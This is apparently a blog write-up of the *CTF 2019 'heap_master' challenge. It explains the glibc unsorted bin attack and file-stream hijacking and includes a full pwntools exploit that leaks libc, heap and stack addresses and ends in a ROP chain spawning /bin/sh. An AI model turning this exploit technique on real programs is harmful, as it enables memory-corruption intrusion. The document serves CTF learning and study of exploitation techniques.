Mid Station

Heap Master Review

近来雨后春笋般冒出的琐事逐渐成为了逃避写blog的借口,或者说搜肠刮肚也找不出几行有价值的文字。
上月看的几部作品除了托尼史塔克的"Love you 3000"以外都记不太清了,应该说在情怀面前其他情节都变成了细枝末节。
以后个人blog上的Writeup尽量都用英文写了,看多了各种日文韩文的资料以后,换位思考一下感觉国际化还是有必要的。

This is a challenage from *CTF 2019 last weekend, a great CTF from sixstar team. For this particular challenge, you could found at least 3 avaliable Writeup (except for this one). The official Writeup here, one from shift-crops, and one from the Balsn Team.

I analyzed all three writeups and personally appreciated the one from Japanese player shift-crops the best. So the following paragraphs will focus on his method and try to clarify some glibc heap attack concepts he used.

The official Writeup and shift-crops’ did a great explanation about reversing process, so I’ll spare that part here. The exploit relays heavily on unsorted bin attack, and here is a brief description of this technique.

Unsorted bin Attack

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
// [PRE-CONDITION]
// sz: non-fastbin size
// dst: where to overwrite
// [BUG] Use-After-Free
// [POST-CONDITION] *dst -> large value (e.g. 0x7ffff7dd1b78)

void *p1 = malloc(sz);
// avoid merge with top chunk
void *p2 = malloc(0x10);

// p1 gets into unsortedbin.
free(p1);
struct malloc_chunk *chunk1 = raw_to_chunk(p1);
size_t target_value = chunk1->fd; // (e.g. 0x7ffff7dd1b78)
// [BUG] Use-After-Free: overwrite p1->bk while it's in unsortedbin.
// x64: dst-0x10, x32: dst-0x8;
// chunk1->bk: p1+0x10
chunk1->bk = dst-0x10

void *p3 = malloc(sz);
assert(*dst == target_value);

Graph

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
UNSORTED_BIN_LIST           HEAP
|
| -------p1-----+
| | PREV_SIZE | ANY MEMORY
| +-------------+
| | SIZE | +------dst-------+
| +-------------+ | * FD * | overwrite with large value like 0x7ffff7dd1b58 (main_arena+88)
+----------> | FD | +----------------+
+-------------+ malloc(sz)
|{{ dst-0x10}}| +----------------->
+-------------+
| ...... |
| |
| |
| |
| |
| |
| |
+-------------+

With unsorted bin attack, one can write a pointer 0x7ffff7dd1b58 (main_arena+88) to arbitrary address. In this challenge, we cannot write anything on heap directly, and we don’t have any provided function to leak addresses, the very first step is utilizing unsorted bin attack to overwrite something around main_arena.

Exploit

I copied the exploit from shift-crops, refactored it a bit and added some comments, seperating the whole exploit into 6 parts.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
from pwn import *
from FILE import IO_FILE_plus_struct
## https://gist.github.com/hzshang/a13b1c6e44e5b33a65ecaec762b793fe

context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']
context.arch = "amd64"
# env = {'LD_PRELOAD' : '/lib/x86_64-linux-gnu/libc.so.6'}
if len(sys.argv) == 1:
p = process('./heap_master1')
elif len(sys.argv) == 3:
p = remote(sys.argv[1], sys.argv[2])

libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

def rc(x):
return p.recv(x)

def ru(x):
return p.recvuntil(x)

def se(x):
return p.send(x)

def sl(x):
return p.sendline(x)

def sea(a, b):
return p.sendafter(a, b)

def sla(a, b):
return p.sendlineafter(a, b)

def info_addr(tag, addr):
return p.info(tag + ': {:#x}'.format(addr))

global wait
wait = True

def add(size):
if wait:
ru(">>")
sl("1")
ru(":")
sl(str(size))
else:
sl("1")
sl(str(size))

def edit(offset, content):
if wait:
sla(">>", "2")
sla(":", str(offset))
sla(":", str(len(content)))
sea(":", content)
else:
sl("2")
sl(str(offset))
sl(str(len(content)))
se(content)


def free(offset):
if wait:
ru(">>")
sl("3")
ru(":")
sl(str(offset))
else:
sl("3")
sl(str(offset))

offset_libc_free_hook = libc.symbols['__free_hook']
offset_libc_max_fast = offset_libc_free_hook + 0x48
offset_libc_stdout = libc.symbols['_IO_2_1_stdout_']

# PART1: overwrite global_max_fast to very big value
edit(0x8, p64(0x91))
edit(0x98, p64(0x21))
edit(0xb8, p64(0x21))
# make chunk1 to unsorted bin
free(0x10)

# unsorted bin attack to overwrite global_max_fast
edit(0x18, p16((offset_libc_max_fast-0x10) & ((1<<16)-1)))
add(0x88)

# PART2: overwrite _IO_2_1_stdout_->_IO_read_end to main_arena+88
edit(0x8, p64(0xf1))
edit(0xf8, p64(0x11))
free(0x10)

edit(0x8, p64(0x91))
edit(0x18, p16((offset_libc_stdout+0x10-0x10) & ((1<<16)-1)))
add(0x88)


# PART3: overwirte _IO_2_1_stdout_->_IO_write_base to main_arena+88 and leak addr
wait = False
edit(0x8, p64(0xf1))
free(0x10)

edit(0x8, p64(0x91))
edit(0x18, p16((offset_libc_stdout+0x20-0x10) & ((1<<16)-1)))
add(0x88)


content = ru("=")
addr_heap_base = u64(content[1:9]) - 0x20
info_addr("addr_heap_base", addr_heap_base)

addr_buf_base = u64(content[0x11: 0x19])
info_addr("addr_buf_base", addr_buf_base)
addr_libc_stdout = u64(content[0x19:0x21]) - 0x10
info_addr("addr_libc_stdout", addr_libc_stdout)
libc.address = addr_libc_stdout - offset_libc_stdout
info_addr("addr_libc_base", libc.address)
addr_stack_base = u64(content[0x859: 0x861]) & ~0xf
info_addr("addr_stack_base", addr_stack_base)

# PART4: overwirte _IO_2_1_stdout_->_chain to to main_arena+88, and link mmap segement to it
edit(0x8, p64(0xf1))
free(0x10)

edit(0x8, p64(0x91))
edit(0x18, p64(addr_libc_stdout+0x68-0x10))
gdb.attach(p, gdbcmd)
add(0x88)

edit(0x8, p64(0x191))
edit(0x198, p64(0x11))
free(0x10)

addr_libc_io_str_jmps = libc.symbols['_IO_file_jumps'] + 0xc0

# PART5: write fake file struct at mmap segment
fake_file = IO_FILE_plus_struct()
fake_file._IO_write_ptr = (addr_stack_base-0x2000 - 0x64)/2 + 1
fake_file._IO_buf_end = (addr_stack_base-0x2000 - 0x64)/2
fake_file.vtable = addr_libc_io_str_jmps
fake_file_str = str(fake_file) + p64(libc.symbols['gets'])

edit(0, fake_file_str)
yn = raw_input('shell? (Y/N) >>')
rop = ROP(libc)
if "n" in yn.lower():
edit(0x100, "./flag\x00")
rop.open(addr_buf_base+0x100, 0)
rop.read(3, addr_buf_base+0x200, 0x60)
rop.write(1, addr_buf_base+0x200, 0x100)
else:
edit(0x100, "/bin/sh\x00")
rop.execve(addr_buf_base + 0x100, 0, 0)

# PART6: trigger _IO_flush_all_lockp to call `gets` and rop.
sla(">>", "0")
sl(cyclic(0x1ae8) + str(rop))
p.interactive()

Investigation

After trying the exploit, Some questions poped up in my head:

  1. Why do we need to change global_fast_max before unsorted bin attack?
  2. Why overwritting _IO_2_1_stdout_->read_end and _IO_2_1_STDOUT->write_base can leak so many addresses?
  3. How does _IO_flush_all_lockp work?

Q1

To answer this question, I eliminated Part1 in exp, and tried to perform consecutive unsorted bin attack, with following script:

1
2
3
4
5
6
7
8
9
10
11
## PART2: overwrite _IO_2_1_stdout_->_IO_read_end to main_arena+88
edit(0x8, p64(0xf1))
edit(0xf8, p64(0x11))
edit(0x108, p64(0x11))
free(0x10)

## PART3: overwirte _IO_2_1_stdout_->_IO_write_end and leak addr
wait = False
edit(0x8, p64(0xf1))
edit(0x18, p16((offset_libc_stdout+0x20-0x10) & ((1<<16)-1)))
add(0x88)

it thown an memory corruption like:

1
*** Error in `./heap_master1': malloc(): memory corruption: 0x00007ffff7dd2610 ***

The arena looks like:

1
2
3
4
5
6
7
8
9
pwndbg> arena
{
mutex = 0,
flags = 1,
fastbinsY = {0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0},
top = 0x555555757020,
last_remainder = 0x0,
bins = {0x30303000, 0x7ffff7dd2600 <_IO_2_1_stdout_>, 0x7ffff7dd1b68 <main_arena+104>...
}

Traced down the source code of malloc, the error thrown at malloc.c:3405 (version: glibc 2.24)

1
2
3
4
5
6
7
8
9
//malloc.c:3504
while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
{
bck = victim->bk;
if (__builtin_expect (victim->size <= 2 * SIZE_SZ, 0)
|| __builtin_expect (victim->size > av->system_mem, 0))
malloc_printerr (check_action, "malloc(): memory corruption",
chunk2mem (victim), av);
size = chunksize (victim);

if we print the varibale victim, it is 0x7ffff7dd2600, which means unsorted_chunks(av)->bk will extract the value of bins[1] here, for sure this address could not pass the check.

The workaround is use fastbin-freeing mechanism to help us fix arena. The source is located at malloc.c:2982

1
2
// malloc.c:2982
while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2)) != old2);

With global_max_fast overwritten with a large value, fake chunk will be treated as a fastbin chunk, this line of code help us to write bin[1] to fake chunk address. BTW, I patched the string /dev/urandom to ./test in prog_init, so for each run we can have the same mmap address. After fixing bin[1], we can perform unsorted bin attack on the same fake chunk again.

1
2
3
4
5
6
7
8
9
pwndbg> arena
{
mutex = 0,
flags = 1,
fastbinsY = {0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0},
top = 0x555555757020,
last_remainder = 0x0,
bins = {0x30303000, 0x30303000, 0x7ffff7dd1b68 <main_arena+104>...
}

As a conclusion, if you somehow want to perform unsorted bin attack on same chunk many times, you should first use unsorted bin attack to overwrite global_max_fast, and then free the fake chunk as a fastbin chunk to fix arena before each unsorted bin attack.

Q2

When printf is called, it eventually call _IO_file_xsputs and then new_do_write.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
//fileops.c:526
static
_IO_size_t
new_do_write (_IO_FILE *fp, const char *data, _IO_size_t to_do)
{
_IO_size_t count;
if (fp->_flags & _IO_IS_APPENDING)
/* On a system without a proper O_APPEND implementation,
you would need to sys_seek(0, SEEK_END) here, but is
not needed nor desirable for Unix- or Posix-like systems.
Instead, just indicate that offset (before and after) is
unpredictable. */
fp->_offset = _IO_pos_BAD;
else if (fp->_IO_read_end != fp->_IO_write_base)
{
_IO_off64_t new_pos
= _IO_SYSSEEK (fp, fp->_IO_write_base - fp->_IO_read_end, 1);
if (new_pos == _IO_pos_BAD)
return 0;
fp->_offset = new_pos;
}
count = _IO_SYSWRITE (fp, data, to_do); //HERE
if (fp->_cur_column && count)
fp->_cur_column = _IO_adjust_column (fp->_cur_column - 1, data, count) + 1;
_IO_setg (fp, fp->_IO_buf_base, fp->_IO_buf_base, fp->_IO_buf_base);
fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_buf_base;
fp->_IO_write_end = (fp->_mode <= 0
&& (fp->_flags & (_IO_LINE_BUF | _IO_UNBUFFERED))
? fp->_IO_buf_base : fp->_IO_buf_end);
return count;
}

When we overwrite _IO_2_1_stdout_->read_end==_IO_2_1_stdout==main_arena+88, it hit line 22, which is the exact line to dump stuff to stdout, data is main_arena+88 here and to_do is 0xb2b. Since there are plenty of juicy addresses around main_arena, so with this leak, we can defeat ASLR and even get stack address.

Q3

Angleboy first introduce _IO_flush_all_lockp hijacking in his blog, and here is another post about bypassing the check since 2.24.

Conclusion

I used to consider unsorted bin attack as kind of weak attack primitive, but it turns out to be super powerful with fsop technique. This challenage is a good example about using multiple unsorted bin attack to perform fsop and hijack control flow.

Reference

  1. https://github.com/sixstars/starctf2019/tree/master/pwn-heap_master
  2. http://shift-crops.hatenablog.com/entry/2019/04/30/131154#hack_me-Pwn-625pt-13-solves
  3. https://balsn.tw/ctf_writeup/20190427-*ctf/#heap-master
  4. https://dangokyo.me/2018/01/20/extra-exploitation-technique-1-_dl_open/
  5. http://4ngelboy.blogspot.com/2016/10/hitcon-ctf-qual-2016-house-of-orange.html
  6. https://xz.aliyun.com/t/2411